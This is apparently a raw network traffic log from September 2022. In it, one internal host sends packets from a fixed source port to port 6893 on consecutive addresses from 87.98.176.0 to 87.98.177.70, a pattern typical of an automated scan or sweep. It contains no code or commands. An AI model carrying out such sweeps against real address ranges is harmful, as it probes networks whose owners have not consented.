Sep 29, 2022 14:50:24.539285898 CEST	59083	6893	192.168.2.6	87.98.176.0
Sep 29, 2022 14:50:24.556019068 CEST	59083	6893	192.168.2.6	87.98.176.1
Sep 29, 2022 14:50:24.556333065 CEST	59083	6893	192.168.2.6	87.98.176.2
Sep 29, 2022 14:50:24.556428909 CEST	59083	6893	192.168.2.6	87.98.176.3
Sep 29, 2022 14:50:24.556592941 CEST	59083	6893	192.168.2.6	87.98.176.4
Sep 29, 2022 14:50:24.556680918 CEST	59083	6893	192.168.2.6	87.98.176.5
Sep 29, 2022 14:50:24.556771040 CEST	59083	6893	192.168.2.6	87.98.176.6
Sep 29, 2022 14:50:24.556937933 CEST	59083	6893	192.168.2.6	87.98.176.7
Sep 29, 2022 14:50:24.557085037 CEST	59083	6893	192.168.2.6	87.98.176.8
Sep 29, 2022 14:50:24.557178020 CEST	59083	6893	192.168.2.6	87.98.176.9
Sep 29, 2022 14:50:24.557333946 CEST	59083	6893	192.168.2.6	87.98.176.10
Sep 29, 2022 14:50:24.557435989 CEST	59083	6893	192.168.2.6	87.98.176.11
Sep 29, 2022 14:50:24.557581902 CEST	59083	6893	192.168.2.6	87.98.176.12
Sep 29, 2022 14:50:24.557713985 CEST	59083	6893	192.168.2.6	87.98.176.13
Sep 29, 2022 14:50:24.557796001 CEST	59083	6893	192.168.2.6	87.98.176.14
Sep 29, 2022 14:50:24.557946920 CEST	59083	6893	192.168.2.6	87.98.176.15
Sep 29, 2022 14:50:24.558069944 CEST	59083	6893	192.168.2.6	87.98.176.16
Sep 29, 2022 14:50:24.558280945 CEST	59083	6893	192.168.2.6	87.98.176.17
Sep 29, 2022 14:50:24.558485031 CEST	59083	6893	192.168.2.6	87.98.176.18
Sep 29, 2022 14:50:24.558613062 CEST	59083	6893	192.168.2.6	87.98.176.19
Sep 29, 2022 14:50:24.558903933 CEST	59083	6893	192.168.2.6	87.98.176.20
Sep 29, 2022 14:50:24.559075117 CEST	59083	6893	192.168.2.6	87.98.176.21
Sep 29, 2022 14:50:24.559396982 CEST	59083	6893	192.168.2.6	87.98.176.22
Sep 29, 2022 14:50:24.559699059 CEST	59083	6893	192.168.2.6	87.98.176.23
Sep 29, 2022 14:50:24.559851885 CEST	59083	6893	192.168.2.6	87.98.176.24
Sep 29, 2022 14:50:24.560075045 CEST	59083	6893	192.168.2.6	87.98.176.25
Sep 29, 2022 14:50:24.560245991 CEST	59083	6893	192.168.2.6	87.98.176.26
Sep 29, 2022 14:50:24.560529947 CEST	59083	6893	192.168.2.6	87.98.176.28
Sep 29, 2022 14:50:24.560612917 CEST	59083	6893	192.168.2.6	87.98.176.27
Sep 29, 2022 14:50:24.560642958 CEST	59083	6893	192.168.2.6	87.98.176.29
Sep 29, 2022 14:50:24.560769081 CEST	59083	6893	192.168.2.6	87.98.176.30
Sep 29, 2022 14:50:24.560890913 CEST	59083	6893	192.168.2.6	87.98.176.31
Sep 29, 2022 14:50:24.561027050 CEST	59083	6893	192.168.2.6	87.98.176.32
Sep 29, 2022 14:50:24.561152935 CEST	59083	6893	192.168.2.6	87.98.176.33
Sep 29, 2022 14:50:24.561304092 CEST	59083	6893	192.168.2.6	87.98.176.34
Sep 29, 2022 14:50:24.561449051 CEST	59083	6893	192.168.2.6	87.98.176.35
Sep 29, 2022 14:50:24.561574936 CEST	59083	6893	192.168.2.6	87.98.176.36
Sep 29, 2022 14:50:24.561846972 CEST	59083	6893	192.168.2.6	87.98.176.38
Sep 29, 2022 14:50:24.561889887 CEST	59083	6893	192.168.2.6	87.98.176.37
Sep 29, 2022 14:50:24.561973095 CEST	59083	6893	192.168.2.6	87.98.176.39
Sep 29, 2022 14:50:24.562383890 CEST	59083	6893	192.168.2.6	87.98.176.40
Sep 29, 2022 14:50:24.562549114 CEST	59083	6893	192.168.2.6	87.98.176.41
Sep 29, 2022 14:50:24.562673092 CEST	59083	6893	192.168.2.6	87.98.176.42
Sep 29, 2022 14:50:24.562830925 CEST	59083	6893	192.168.2.6	87.98.176.43
Sep 29, 2022 14:50:24.562963009 CEST	59083	6893	192.168.2.6	87.98.176.44
Sep 29, 2022 14:50:24.563169003 CEST	59083	6893	192.168.2.6	87.98.176.45
Sep 29, 2022 14:50:24.563703060 CEST	59083	6893	192.168.2.6	87.98.176.46
Sep 29, 2022 14:50:24.563893080 CEST	59083	6893	192.168.2.6	87.98.176.47
Sep 29, 2022 14:50:24.564162016 CEST	59083	6893	192.168.2.6	87.98.176.48
Sep 29, 2022 14:50:24.564353943 CEST	59083	6893	192.168.2.6	87.98.176.49
Sep 29, 2022 14:50:24.564544916 CEST	59083	6893	192.168.2.6	87.98.176.50
Sep 29, 2022 14:50:24.564702034 CEST	59083	6893	192.168.2.6	87.98.176.51
Sep 29, 2022 14:50:24.564887047 CEST	59083	6893	192.168.2.6	87.98.176.52
Sep 29, 2022 14:50:24.565036058 CEST	59083	6893	192.168.2.6	87.98.176.53
Sep 29, 2022 14:50:24.565208912 CEST	59083	6893	192.168.2.6	87.98.176.54
Sep 29, 2022 14:50:24.565327883 CEST	59083	6893	192.168.2.6	87.98.176.55
Sep 29, 2022 14:50:24.565479994 CEST	59083	6893	192.168.2.6	87.98.176.56
Sep 29, 2022 14:50:24.565635920 CEST	59083	6893	192.168.2.6	87.98.176.57
Sep 29, 2022 14:50:24.565757036 CEST	59083	6893	192.168.2.6	87.98.176.58
Sep 29, 2022 14:50:24.566893101 CEST	59083	6893	192.168.2.6	87.98.176.59
Sep 29, 2022 14:50:24.567063093 CEST	59083	6893	192.168.2.6	87.98.176.60
Sep 29, 2022 14:50:24.567316055 CEST	59083	6893	192.168.2.6	87.98.176.61
Sep 29, 2022 14:50:24.567459106 CEST	59083	6893	192.168.2.6	87.98.176.62
Sep 29, 2022 14:50:24.567601919 CEST	59083	6893	192.168.2.6	87.98.176.63
Sep 29, 2022 14:50:24.567748070 CEST	59083	6893	192.168.2.6	87.98.176.64
Sep 29, 2022 14:50:24.567888975 CEST	59083	6893	192.168.2.6	87.98.176.65
Sep 29, 2022 14:50:24.568056107 CEST	59083	6893	192.168.2.6	87.98.176.66
Sep 29, 2022 14:50:24.568126917 CEST	59083	6893	192.168.2.6	87.98.176.67
Sep 29, 2022 14:50:24.568207026 CEST	59083	6893	192.168.2.6	87.98.176.68
Sep 29, 2022 14:50:24.568466902 CEST	59083	6893	192.168.2.6	87.98.176.70
Sep 29, 2022 14:50:24.568516016 CEST	59083	6893	192.168.2.6	87.98.176.69
Sep 29, 2022 14:50:24.568583965 CEST	59083	6893	192.168.2.6	87.98.176.71
Sep 29, 2022 14:50:24.568732977 CEST	59083	6893	192.168.2.6	87.98.176.72
Sep 29, 2022 14:50:24.568873882 CEST	59083	6893	192.168.2.6	87.98.176.73
Sep 29, 2022 14:50:24.569072962 CEST	59083	6893	192.168.2.6	87.98.176.74
Sep 29, 2022 14:50:24.569153070 CEST	59083	6893	192.168.2.6	87.98.176.75
Sep 29, 2022 14:50:24.569303036 CEST	59083	6893	192.168.2.6	87.98.176.76
Sep 29, 2022 14:50:24.569467068 CEST	59083	6893	192.168.2.6	87.98.176.77
Sep 29, 2022 14:50:24.569849014 CEST	59083	6893	192.168.2.6	87.98.176.78
Sep 29, 2022 14:50:24.569976091 CEST	59083	6893	192.168.2.6	87.98.176.79
Sep 29, 2022 14:50:24.570050001 CEST	59083	6893	192.168.2.6	87.98.176.80
Sep 29, 2022 14:50:24.570147038 CEST	59083	6893	192.168.2.6	87.98.176.81
Sep 29, 2022 14:50:24.570239067 CEST	59083	6893	192.168.2.6	87.98.176.82
Sep 29, 2022 14:50:24.570477009 CEST	59083	6893	192.168.2.6	87.98.176.83
Sep 29, 2022 14:50:24.570869923 CEST	59083	6893	192.168.2.6	87.98.176.84
Sep 29, 2022 14:50:24.571036100 CEST	59083	6893	192.168.2.6	87.98.176.85
Sep 29, 2022 14:50:24.571180105 CEST	59083	6893	192.168.2.6	87.98.176.86
Sep 29, 2022 14:50:24.571276903 CEST	59083	6893	192.168.2.6	87.98.176.87
Sep 29, 2022 14:50:24.571429968 CEST	59083	6893	192.168.2.6	87.98.176.88
Sep 29, 2022 14:50:24.571666002 CEST	59083	6893	192.168.2.6	87.98.176.89
Sep 29, 2022 14:50:24.571799040 CEST	59083	6893	192.168.2.6	87.98.176.90
Sep 29, 2022 14:50:24.571966887 CEST	59083	6893	192.168.2.6	87.98.176.91
Sep 29, 2022 14:50:24.572269917 CEST	59083	6893	192.168.2.6	87.98.176.92
Sep 29, 2022 14:50:24.572455883 CEST	59083	6893	192.168.2.6	87.98.176.93
Sep 29, 2022 14:50:24.572590113 CEST	59083	6893	192.168.2.6	87.98.176.94
Sep 29, 2022 14:50:24.572715998 CEST	59083	6893	192.168.2.6	87.98.176.95
Sep 29, 2022 14:50:24.572868109 CEST	59083	6893	192.168.2.6	87.98.176.96
Sep 29, 2022 14:50:24.573009014 CEST	59083	6893	192.168.2.6	87.98.176.97
Sep 29, 2022 14:50:24.573225975 CEST	59083	6893	192.168.2.6	87.98.176.98
Sep 29, 2022 14:50:24.573390961 CEST	59083	6893	192.168.2.6	87.98.176.99
Sep 29, 2022 14:50:24.573574066 CEST	59083	6893	192.168.2.6	87.98.176.100
Sep 29, 2022 14:50:24.573684931 CEST	59083	6893	192.168.2.6	87.98.176.101
Sep 29, 2022 14:50:24.573777914 CEST	59083	6893	192.168.2.6	87.98.176.102
Sep 29, 2022 14:50:24.573882103 CEST	59083	6893	192.168.2.6	87.98.176.103
Sep 29, 2022 14:50:24.573978901 CEST	59083	6893	192.168.2.6	87.98.176.104
Sep 29, 2022 14:50:24.574172974 CEST	59083	6893	192.168.2.6	87.98.176.105
Sep 29, 2022 14:50:24.574378014 CEST	59083	6893	192.168.2.6	87.98.176.107
Sep 29, 2022 14:50:24.574457884 CEST	59083	6893	192.168.2.6	87.98.176.108
Sep 29, 2022 14:50:24.574527979 CEST	59083	6893	192.168.2.6	87.98.176.106
Sep 29, 2022 14:50:24.574614048 CEST	59083	6893	192.168.2.6	87.98.176.109
Sep 29, 2022 14:50:24.574665070 CEST	59083	6893	192.168.2.6	87.98.176.110
Sep 29, 2022 14:50:24.574898005 CEST	59083	6893	192.168.2.6	87.98.176.111
Sep 29, 2022 14:50:24.575021029 CEST	59083	6893	192.168.2.6	87.98.176.112
Sep 29, 2022 14:50:24.575283051 CEST	59083	6893	192.168.2.6	87.98.176.113
Sep 29, 2022 14:50:24.575433969 CEST	59083	6893	192.168.2.6	87.98.176.114
Sep 29, 2022 14:50:24.575531006 CEST	59083	6893	192.168.2.6	87.98.176.115
Sep 29, 2022 14:50:24.575685978 CEST	59083	6893	192.168.2.6	87.98.176.116
Sep 29, 2022 14:50:24.576044083 CEST	59083	6893	192.168.2.6	87.98.176.117
Sep 29, 2022 14:50:24.576293945 CEST	59083	6893	192.168.2.6	87.98.176.118
Sep 29, 2022 14:50:24.576602936 CEST	59083	6893	192.168.2.6	87.98.176.119
Sep 29, 2022 14:50:24.576847076 CEST	59083	6893	192.168.2.6	87.98.176.120
Sep 29, 2022 14:50:24.576937914 CEST	59083	6893	192.168.2.6	87.98.176.121
Sep 29, 2022 14:50:24.577095985 CEST	59083	6893	192.168.2.6	87.98.176.122
Sep 29, 2022 14:50:24.577696085 CEST	59083	6893	192.168.2.6	87.98.176.123
Sep 29, 2022 14:50:24.577816010 CEST	59083	6893	192.168.2.6	87.98.176.124
Sep 29, 2022 14:50:24.577980042 CEST	59083	6893	192.168.2.6	87.98.176.125
Sep 29, 2022 14:50:24.578113079 CEST	59083	6893	192.168.2.6	87.98.176.126
Sep 29, 2022 14:50:24.578208923 CEST	59083	6893	192.168.2.6	87.98.176.127
Sep 29, 2022 14:50:24.578382015 CEST	59083	6893	192.168.2.6	87.98.176.128
Sep 29, 2022 14:50:24.578617096 CEST	59083	6893	192.168.2.6	87.98.176.129
Sep 29, 2022 14:50:24.578778982 CEST	59083	6893	192.168.2.6	87.98.176.130
Sep 29, 2022 14:50:24.578864098 CEST	59083	6893	192.168.2.6	87.98.176.131
Sep 29, 2022 14:50:24.578964949 CEST	59083	6893	192.168.2.6	87.98.176.132
Sep 29, 2022 14:50:24.579118967 CEST	59083	6893	192.168.2.6	87.98.176.133
Sep 29, 2022 14:50:24.579243898 CEST	59083	6893	192.168.2.6	87.98.176.134
Sep 29, 2022 14:50:24.579458952 CEST	59083	6893	192.168.2.6	87.98.176.135
Sep 29, 2022 14:50:24.579776049 CEST	59083	6893	192.168.2.6	87.98.176.137
Sep 29, 2022 14:50:24.579796076 CEST	59083	6893	192.168.2.6	87.98.176.136
Sep 29, 2022 14:50:24.579942942 CEST	59083	6893	192.168.2.6	87.98.176.138
Sep 29, 2022 14:50:24.580075026 CEST	59083	6893	192.168.2.6	87.98.176.139
Sep 29, 2022 14:50:24.580157042 CEST	59083	6893	192.168.2.6	87.98.176.140
Sep 29, 2022 14:50:24.580243111 CEST	59083	6893	192.168.2.6	87.98.176.141
Sep 29, 2022 14:50:24.580395937 CEST	59083	6893	192.168.2.6	87.98.176.142
Sep 29, 2022 14:50:24.580617905 CEST	59083	6893	192.168.2.6	87.98.176.143
Sep 29, 2022 14:50:24.580765009 CEST	59083	6893	192.168.2.6	87.98.176.144
Sep 29, 2022 14:50:24.580960035 CEST	59083	6893	192.168.2.6	87.98.176.145
Sep 29, 2022 14:50:24.581038952 CEST	59083	6893	192.168.2.6	87.98.176.146
Sep 29, 2022 14:50:24.581178904 CEST	59083	6893	192.168.2.6	87.98.176.147
Sep 29, 2022 14:50:24.581319094 CEST	59083	6893	192.168.2.6	87.98.176.148
Sep 29, 2022 14:50:24.581464052 CEST	59083	6893	192.168.2.6	87.98.176.149
Sep 29, 2022 14:50:24.583405972 CEST	59083	6893	192.168.2.6	87.98.176.150
Sep 29, 2022 14:50:24.583570957 CEST	59083	6893	192.168.2.6	87.98.176.151
Sep 29, 2022 14:50:24.583703041 CEST	59083	6893	192.168.2.6	87.98.176.152
Sep 29, 2022 14:50:24.583882093 CEST	59083	6893	192.168.2.6	87.98.176.154
Sep 29, 2022 14:50:24.583988905 CEST	59083	6893	192.168.2.6	87.98.176.153
Sep 29, 2022 14:50:24.583997011 CEST	59083	6893	192.168.2.6	87.98.176.155
Sep 29, 2022 14:50:24.584098101 CEST	59083	6893	192.168.2.6	87.98.176.156
Sep 29, 2022 14:50:24.584187984 CEST	59083	6893	192.168.2.6	87.98.176.157
Sep 29, 2022 14:50:24.584302902 CEST	59083	6893	192.168.2.6	87.98.176.158
Sep 29, 2022 14:50:24.584455967 CEST	59083	6893	192.168.2.6	87.98.176.159
Sep 29, 2022 14:50:24.584556103 CEST	59083	6893	192.168.2.6	87.98.176.160
Sep 29, 2022 14:50:24.584647894 CEST	59083	6893	192.168.2.6	87.98.176.161
Sep 29, 2022 14:50:24.584778070 CEST	59083	6893	192.168.2.6	87.98.176.162
Sep 29, 2022 14:50:24.584861040 CEST	59083	6893	192.168.2.6	87.98.176.163
Sep 29, 2022 14:50:24.584959030 CEST	59083	6893	192.168.2.6	87.98.176.164
Sep 29, 2022 14:50:24.585057974 CEST	59083	6893	192.168.2.6	87.98.176.165
Sep 29, 2022 14:50:24.585159063 CEST	59083	6893	192.168.2.6	87.98.176.166
Sep 29, 2022 14:50:24.585289001 CEST	59083	6893	192.168.2.6	87.98.176.167
Sep 29, 2022 14:50:24.585449934 CEST	59083	6893	192.168.2.6	87.98.176.168
Sep 29, 2022 14:50:24.585544109 CEST	59083	6893	192.168.2.6	87.98.176.169
Sep 29, 2022 14:50:24.585691929 CEST	59083	6893	192.168.2.6	87.98.176.170
Sep 29, 2022 14:50:24.585803032 CEST	59083	6893	192.168.2.6	87.98.176.171
Sep 29, 2022 14:50:24.585901022 CEST	59083	6893	192.168.2.6	87.98.176.172
Sep 29, 2022 14:50:24.586002111 CEST	59083	6893	192.168.2.6	87.98.176.173
Sep 29, 2022 14:50:24.586093903 CEST	59083	6893	192.168.2.6	87.98.176.174
Sep 29, 2022 14:50:24.586180925 CEST	59083	6893	192.168.2.6	87.98.176.175
Sep 29, 2022 14:50:24.586276054 CEST	59083	6893	192.168.2.6	87.98.176.176
Sep 29, 2022 14:50:24.586384058 CEST	59083	6893	192.168.2.6	87.98.176.177
Sep 29, 2022 14:50:24.586476088 CEST	59083	6893	192.168.2.6	87.98.176.178
Sep 29, 2022 14:50:24.586559057 CEST	59083	6893	192.168.2.6	87.98.176.179
Sep 29, 2022 14:50:24.586669922 CEST	59083	6893	192.168.2.6	87.98.176.180
Sep 29, 2022 14:50:24.586770058 CEST	59083	6893	192.168.2.6	87.98.176.181
Sep 29, 2022 14:50:24.586941957 CEST	59083	6893	192.168.2.6	87.98.176.182
Sep 29, 2022 14:50:24.586982012 CEST	59083	6893	192.168.2.6	87.98.176.183
Sep 29, 2022 14:50:24.587088108 CEST	59083	6893	192.168.2.6	87.98.176.184
Sep 29, 2022 14:50:24.587296963 CEST	59083	6893	192.168.2.6	87.98.176.186
Sep 29, 2022 14:50:24.587419033 CEST	59083	6893	192.168.2.6	87.98.176.185
Sep 29, 2022 14:50:24.587421894 CEST	59083	6893	192.168.2.6	87.98.176.187
Sep 29, 2022 14:50:24.587486029 CEST	59083	6893	192.168.2.6	87.98.176.188
Sep 29, 2022 14:50:24.587651014 CEST	59083	6893	192.168.2.6	87.98.176.189
Sep 29, 2022 14:50:24.587785959 CEST	59083	6893	192.168.2.6	87.98.176.190
Sep 29, 2022 14:50:24.587843895 CEST	59083	6893	192.168.2.6	87.98.176.191
Sep 29, 2022 14:50:24.589999914 CEST	59083	6893	192.168.2.6	87.98.176.192
Sep 29, 2022 14:50:24.590085983 CEST	59083	6893	192.168.2.6	87.98.176.193
Sep 29, 2022 14:50:24.590194941 CEST	59083	6893	192.168.2.6	87.98.176.194
Sep 29, 2022 14:50:24.590280056 CEST	59083	6893	192.168.2.6	87.98.176.195
Sep 29, 2022 14:50:24.590374947 CEST	59083	6893	192.168.2.6	87.98.176.196
Sep 29, 2022 14:50:24.590502977 CEST	59083	6893	192.168.2.6	87.98.176.197
Sep 29, 2022 14:50:24.590543985 CEST	59083	6893	192.168.2.6	87.98.176.198
Sep 29, 2022 14:50:24.590749979 CEST	59083	6893	192.168.2.6	87.98.176.199
Sep 29, 2022 14:50:24.590749979 CEST	59083	6893	192.168.2.6	87.98.176.200
Sep 29, 2022 14:50:24.590815067 CEST	59083	6893	192.168.2.6	87.98.176.201
Sep 29, 2022 14:50:24.591010094 CEST	59083	6893	192.168.2.6	87.98.176.202
Sep 29, 2022 14:50:24.591305971 CEST	59083	6893	192.168.2.6	87.98.176.203
Sep 29, 2022 14:50:24.591464043 CEST	59083	6893	192.168.2.6	87.98.176.204
Sep 29, 2022 14:50:24.591617107 CEST	59083	6893	192.168.2.6	87.98.176.205
Sep 29, 2022 14:50:24.591698885 CEST	59083	6893	192.168.2.6	87.98.176.206
Sep 29, 2022 14:50:24.591778994 CEST	59083	6893	192.168.2.6	87.98.176.207
Sep 29, 2022 14:50:24.591923952 CEST	59083	6893	192.168.2.6	87.98.176.208
Sep 29, 2022 14:50:24.592066050 CEST	59083	6893	192.168.2.6	87.98.176.209
Sep 29, 2022 14:50:24.592154026 CEST	59083	6893	192.168.2.6	87.98.176.210
Sep 29, 2022 14:50:24.592319012 CEST	59083	6893	192.168.2.6	87.98.176.211
Sep 29, 2022 14:50:24.592434883 CEST	59083	6893	192.168.2.6	87.98.176.212
Sep 29, 2022 14:50:24.592530966 CEST	59083	6893	192.168.2.6	87.98.176.213
Sep 29, 2022 14:50:24.592613935 CEST	59083	6893	192.168.2.6	87.98.176.214
Sep 29, 2022 14:50:24.592694998 CEST	59083	6893	192.168.2.6	87.98.176.215
Sep 29, 2022 14:50:24.592845917 CEST	59083	6893	192.168.2.6	87.98.176.216
Sep 29, 2022 14:50:24.593106031 CEST	59083	6893	192.168.2.6	87.98.176.218
Sep 29, 2022 14:50:24.593249083 CEST	59083	6893	192.168.2.6	87.98.176.219
Sep 29, 2022 14:50:24.593301058 CEST	59083	6893	192.168.2.6	87.98.176.217
Sep 29, 2022 14:50:24.593384027 CEST	59083	6893	192.168.2.6	87.98.176.220
Sep 29, 2022 14:50:24.593494892 CEST	59083	6893	192.168.2.6	87.98.176.221
Sep 29, 2022 14:50:24.593615055 CEST	59083	6893	192.168.2.6	87.98.176.222
Sep 29, 2022 14:50:24.593692064 CEST	59083	6893	192.168.2.6	87.98.176.223
Sep 29, 2022 14:50:24.593851089 CEST	59083	6893	192.168.2.6	87.98.176.224
Sep 29, 2022 14:50:24.594096899 CEST	59083	6893	192.168.2.6	87.98.176.225
Sep 29, 2022 14:50:24.594532967 CEST	59083	6893	192.168.2.6	87.98.176.226
Sep 29, 2022 14:50:24.594599009 CEST	59083	6893	192.168.2.6	87.98.176.227
Sep 29, 2022 14:50:24.603193998 CEST	59083	6893	192.168.2.6	87.98.176.228
Sep 29, 2022 14:50:24.603713036 CEST	59083	6893	192.168.2.6	87.98.176.229
Sep 29, 2022 14:50:24.603856087 CEST	59083	6893	192.168.2.6	87.98.176.230
Sep 29, 2022 14:50:24.604034901 CEST	59083	6893	192.168.2.6	87.98.176.231
Sep 29, 2022 14:50:24.604109049 CEST	59083	6893	192.168.2.6	87.98.176.232
Sep 29, 2022 14:50:24.604163885 CEST	59083	6893	192.168.2.6	87.98.176.233
Sep 29, 2022 14:50:24.604386091 CEST	59083	6893	192.168.2.6	87.98.176.234
Sep 29, 2022 14:50:24.604597092 CEST	59083	6893	192.168.2.6	87.98.176.235
Sep 29, 2022 14:50:24.604753017 CEST	59083	6893	192.168.2.6	87.98.176.236
Sep 29, 2022 14:50:24.604906082 CEST	59083	6893	192.168.2.6	87.98.176.237
Sep 29, 2022 14:50:24.605062008 CEST	59083	6893	192.168.2.6	87.98.176.238
Sep 29, 2022 14:50:24.605145931 CEST	59083	6893	192.168.2.6	87.98.176.239
Sep 29, 2022 14:50:24.605278015 CEST	59083	6893	192.168.2.6	87.98.176.240
Sep 29, 2022 14:50:24.605482101 CEST	59083	6893	192.168.2.6	87.98.176.241
Sep 29, 2022 14:50:24.605798960 CEST	59083	6893	192.168.2.6	87.98.176.242
Sep 29, 2022 14:50:24.605947018 CEST	59083	6893	192.168.2.6	87.98.176.243
Sep 29, 2022 14:50:24.606071949 CEST	59083	6893	192.168.2.6	87.98.176.244
Sep 29, 2022 14:50:24.606231928 CEST	59083	6893	192.168.2.6	87.98.176.245
Sep 29, 2022 14:50:24.606512070 CEST	59083	6893	192.168.2.6	87.98.176.247
Sep 29, 2022 14:50:24.606662989 CEST	59083	6893	192.168.2.6	87.98.176.248
Sep 29, 2022 14:50:24.606755018 CEST	59083	6893	192.168.2.6	87.98.176.246
Sep 29, 2022 14:50:24.606821060 CEST	59083	6893	192.168.2.6	87.98.176.249
Sep 29, 2022 14:50:24.606910944 CEST	59083	6893	192.168.2.6	87.98.176.250
Sep 29, 2022 14:50:24.607042074 CEST	59083	6893	192.168.2.6	87.98.176.251
Sep 29, 2022 14:50:24.607151985 CEST	59083	6893	192.168.2.6	87.98.176.252
Sep 29, 2022 14:50:24.607291937 CEST	59083	6893	192.168.2.6	87.98.176.253
Sep 29, 2022 14:50:24.607393980 CEST	59083	6893	192.168.2.6	87.98.176.254
Sep 29, 2022 14:50:25.637890100 CEST	59083	6893	192.168.2.6	87.98.176.255
Sep 29, 2022 14:50:25.637967110 CEST	59083	6893	192.168.2.6	87.98.177.0
Sep 29, 2022 14:50:25.638077021 CEST	59083	6893	192.168.2.6	87.98.177.1
Sep 29, 2022 14:50:25.638196945 CEST	59083	6893	192.168.2.6	87.98.177.2
Sep 29, 2022 14:50:25.638328075 CEST	59083	6893	192.168.2.6	87.98.177.3
Sep 29, 2022 14:50:25.638391972 CEST	59083	6893	192.168.2.6	87.98.177.4
Sep 29, 2022 14:50:25.638413906 CEST	59083	6893	192.168.2.6	87.98.177.5
Sep 29, 2022 14:50:25.638485909 CEST	59083	6893	192.168.2.6	87.98.177.6
Sep 29, 2022 14:50:25.638561010 CEST	59083	6893	192.168.2.6	87.98.177.7
Sep 29, 2022 14:50:25.638622999 CEST	59083	6893	192.168.2.6	87.98.177.8
Sep 29, 2022 14:50:25.638706923 CEST	59083	6893	192.168.2.6	87.98.177.9
Sep 29, 2022 14:50:25.639056921 CEST	59083	6893	192.168.2.6	87.98.177.10
Sep 29, 2022 14:50:25.639296055 CEST	59083	6893	192.168.2.6	87.98.177.11
Sep 29, 2022 14:50:25.639381886 CEST	59083	6893	192.168.2.6	87.98.177.12
Sep 29, 2022 14:50:25.639707088 CEST	59083	6893	192.168.2.6	87.98.177.13
Sep 29, 2022 14:50:25.639789104 CEST	59083	6893	192.168.2.6	87.98.177.14
Sep 29, 2022 14:50:25.639879942 CEST	59083	6893	192.168.2.6	87.98.177.15
Sep 29, 2022 14:50:25.639956951 CEST	59083	6893	192.168.2.6	87.98.177.16
Sep 29, 2022 14:50:25.640047073 CEST	59083	6893	192.168.2.6	87.98.177.17
Sep 29, 2022 14:50:25.640223026 CEST	59083	6893	192.168.2.6	87.98.177.19
Sep 29, 2022 14:50:25.640289068 CEST	59083	6893	192.168.2.6	87.98.177.20
Sep 29, 2022 14:50:25.640371084 CEST	59083	6893	192.168.2.6	87.98.177.21
Sep 29, 2022 14:50:25.640434027 CEST	59083	6893	192.168.2.6	87.98.177.22
Sep 29, 2022 14:50:25.640451908 CEST	59083	6893	192.168.2.6	87.98.177.18
Sep 29, 2022 14:50:25.640757084 CEST	59083	6893	192.168.2.6	87.98.177.23
Sep 29, 2022 14:50:25.641587973 CEST	59083	6893	192.168.2.6	87.98.177.24
Sep 29, 2022 14:50:25.641776085 CEST	59083	6893	192.168.2.6	87.98.177.25
Sep 29, 2022 14:50:25.641925097 CEST	59083	6893	192.168.2.6	87.98.177.26
Sep 29, 2022 14:50:25.642055988 CEST	59083	6893	192.168.2.6	87.98.177.27
Sep 29, 2022 14:50:25.642194986 CEST	59083	6893	192.168.2.6	87.98.177.28
Sep 29, 2022 14:50:25.642286062 CEST	59083	6893	192.168.2.6	87.98.177.29
Sep 29, 2022 14:50:25.642447948 CEST	59083	6893	192.168.2.6	87.98.177.30
Sep 29, 2022 14:50:25.642592907 CEST	59083	6893	192.168.2.6	87.98.177.31
Sep 29, 2022 14:50:25.642720938 CEST	59083	6893	192.168.2.6	87.98.177.32
Sep 29, 2022 14:50:25.642860889 CEST	59083	6893	192.168.2.6	87.98.177.33
Sep 29, 2022 14:50:25.642983913 CEST	59083	6893	192.168.2.6	87.98.177.34
Sep 29, 2022 14:50:25.643188000 CEST	59083	6893	192.168.2.6	87.98.177.36
Sep 29, 2022 14:50:25.643243074 CEST	59083	6893	192.168.2.6	87.98.177.35
Sep 29, 2022 14:50:25.643256903 CEST	59083	6893	192.168.2.6	87.98.177.37
Sep 29, 2022 14:50:25.643347025 CEST	59083	6893	192.168.2.6	87.98.177.38
Sep 29, 2022 14:50:25.643517971 CEST	59083	6893	192.168.2.6	87.98.177.39
Sep 29, 2022 14:50:25.645524979 CEST	59083	6893	192.168.2.6	87.98.177.40
Sep 29, 2022 14:50:25.647037983 CEST	59083	6893	192.168.2.6	87.98.177.43
Sep 29, 2022 14:50:25.647037983 CEST	59083	6893	192.168.2.6	87.98.177.53
Sep 29, 2022 14:50:25.647042990 CEST	59083	6893	192.168.2.6	87.98.177.42
Sep 29, 2022 14:50:25.647043943 CEST	59083	6893	192.168.2.6	87.98.177.52
Sep 29, 2022 14:50:25.647053957 CEST	59083	6893	192.168.2.6	87.98.177.41
Sep 29, 2022 14:50:25.647052050 CEST	59083	6893	192.168.2.6	87.98.177.44
Sep 29, 2022 14:50:25.647052050 CEST	59083	6893	192.168.2.6	87.98.177.50
Sep 29, 2022 14:50:25.647066116 CEST	59083	6893	192.168.2.6	87.98.177.47
Sep 29, 2022 14:50:25.647066116 CEST	59083	6893	192.168.2.6	87.98.177.49
Sep 29, 2022 14:50:25.647073030 CEST	59083	6893	192.168.2.6	87.98.177.46
Sep 29, 2022 14:50:25.647073030 CEST	59083	6893	192.168.2.6	87.98.177.48
Sep 29, 2022 14:50:25.647109032 CEST	59083	6893	192.168.2.6	87.98.177.45
Sep 29, 2022 14:50:25.647109985 CEST	59083	6893	192.168.2.6	87.98.177.51
Sep 29, 2022 14:50:25.647151947 CEST	59083	6893	192.168.2.6	87.98.177.55
Sep 29, 2022 14:50:25.647150993 CEST	59083	6893	192.168.2.6	87.98.177.54
Sep 29, 2022 14:50:25.647238970 CEST	59083	6893	192.168.2.6	87.98.177.56
Sep 29, 2022 14:50:25.647316933 CEST	59083	6893	192.168.2.6	87.98.177.57
Sep 29, 2022 14:50:25.647484064 CEST	59083	6893	192.168.2.6	87.98.177.58
Sep 29, 2022 14:50:25.647569895 CEST	59083	6893	192.168.2.6	87.98.177.59
Sep 29, 2022 14:50:25.647696972 CEST	59083	6893	192.168.2.6	87.98.177.60
Sep 29, 2022 14:50:25.647962093 CEST	59083	6893	192.168.2.6	87.98.177.61
Sep 29, 2022 14:50:25.647969007 CEST	59083	6893	192.168.2.6	87.98.177.62
Sep 29, 2022 14:50:25.648181915 CEST	59083	6893	192.168.2.6	87.98.177.63
Sep 29, 2022 14:50:25.648530960 CEST	59083	6893	192.168.2.6	87.98.177.64
Sep 29, 2022 14:50:25.648727894 CEST	59083	6893	192.168.2.6	87.98.177.65
Sep 29, 2022 14:50:25.648857117 CEST	59083	6893	192.168.2.6	87.98.177.66
Sep 29, 2022 14:50:25.649049997 CEST	59083	6893	192.168.2.6	87.98.177.68
Sep 29, 2022 14:50:25.649168015 CEST	59083	6893	192.168.2.6	87.98.177.69
Sep 29, 2022 14:50:25.649266005 CEST	59083	6893	192.168.2.6	87.98.177.70
